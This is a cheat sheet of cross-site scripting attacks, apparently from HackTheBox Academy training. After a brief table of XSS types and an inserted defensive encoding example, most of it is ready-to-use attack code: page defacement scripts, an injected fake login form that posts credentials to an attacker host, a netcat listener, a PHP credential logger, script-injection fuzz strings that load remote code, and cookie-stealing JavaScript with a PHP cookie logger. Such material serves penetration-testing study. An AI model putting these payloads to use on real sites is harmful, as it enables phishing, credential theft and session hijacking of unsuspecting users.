There are three main types of XSS vulnerability:

| Type | Description |
| --- | --- |
| Stored (Persistent) XSS | The most severe XSS type; occurs when user input is stored in the back-end database and displayed whenever it is retrieved (e.g. posts or comments) |
| Reflected (Non-Persistent) XSS | Occurs when user input is processed by the back-end server and displayed on the page without being stored (e.g. search results or error messages) |
| DOM-based XSS | Another non-persistent type; occurs when user input is displayed directly in the browser and processed entirely on the client side, without ever reaching the back-end server (e.g. via client-side HTTP parameters or anchor tags) |
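The three types differ only in where the untrusted input comes from; all of them depend on that input reaching an HTML or URL sink unencoded. As an added defensive example (not part of the original notes), the following Node.js code applies the right encoder for each output context and checks that the breakout strings used in the Fuzz list further down (`'>`, `">`, `javascript:`) are rendered inert. `OUR_IP` is the page's placeholder and `placeholder.invalid` is an assumed base used only to resolve relative links.

```javascript
// Added defensive example, not from the original notes: encode untrusted
// input for each output context so the breakout payloads become inert text.

// HTML text and quoted-attribute context: escape the five significant
// characters, which neutralizes the '> and "> breakouts from the Fuzz list.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// URL (href/src) context: escaping alone does not stop javascript: URIs, so
// resolve the value and allow only http(s); everything else becomes "#".
// placeholder.invalid is an assumed base used only to resolve relative links.
function safeHref(url) {
  let parsed;
  try {
    parsed = new URL(String(url), "https://placeholder.invalid/");
  } catch {
    return "#";
  }
  return ["http:", "https:"].includes(parsed.protocol) ? escapeHtml(url) : "#";
}

// A reflected "search results" fragment built with the right encoder for
// each sink: text node, attribute value and href.
function renderSearchResult(query, link) {
  return (
    `<p>Results for "${escapeHtml(query)}"</p>` +
    `<input type="text" name="q" value="${escapeHtml(query)}">` +
    `<a href="${safeHref(link)}">source</a>`
  );
}

// Constructed inputs with the same shape as the page's fuzz strings.
const BREAKOUTS = [
  "<script src=http://OUR_IP></script>",
  "'><script src=http://OUR_IP></script>",
  "\"><script src=http://OUR_IP></script>",
];

// True when none of the breakouts yields a live <script> tag after encoding.
function allNeutralized() {
  return BREAKOUTS.every((p) => !/<script/i.test(renderSearchResult(p, p)));
}
```

In a real application the same rule applies to the DOM sinks used below: write untrusted data with `textContent` or `setAttribute`, not `innerHTML` or `document.write`.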

Defacing page elements

Changing the background

<script>document.body.style.background = "#141d2b"</script>  

# or

<script>document.body.style.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>

Changing the page title

<script>document.title = 'HackTheBox Academy'</script>

Changing the page text

document.getElementById("todo").innerHTML = "New Text"  

# or

document.getElementsByTagName('body')[0].innerHTML = "New Text"

XSS payload

<script>document.getElementsByTagName('body')[0].innerHTML = '<center><h1 style="color: white">Cyber Security Training</h1><p style="color: white">by <img src="https://academy.hackthebox.com/images/logo-htb.svg" height="25px" alt="HTB Academy"> </p></center>'</script>


Phishing

Phishing form

<h3>Please login to continue</h3>  
<form action=http://OUR_IP>
<input type="username" name="username" placeholder="Username">
<input type="password" name="password" placeholder="Password">
<input type="submit" name="submit" value="Login">
</form>

Payload

document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');<!--  

<!-- Remove certain elements (e.g. the original URL form) -->
document.getElementById('urlform').remove();

Server

nc -lvnp 80

or

<?php
// Append any submitted credentials to creds.txt, then redirect the browser
// back to the legitimate page so the user sees a normal login flow.
if (isset($_GET['username']) && isset($_GET['password'])) {
    $file = fopen("creds.txt", "a+");
    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
    header("Location: http://SERVER_IP/phishing/index.php");
    fclose($file);
    exit();
}
?>

Hijacking

Fuzz

<script src=http://OUR_IP></script>  
'><script src=http://OUR_IP></script>
"><script src=http://OUR_IP></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'http://OUR_IP\';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>
<script>$.getScript("http://OUR_IP")</script>

...

Payload

'><script src=http://OUR_IP/script.js></script> 

Server

script.js

document.location='http://OUR_IP/'+document.cookie;
// or
new Image().src='http://OUR_IP/'+document.cookie;

index.php

<?php
// Split the reflected cookie string on ";" and log each decoded cookie
// together with the requesting IP to cookies.txt.
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>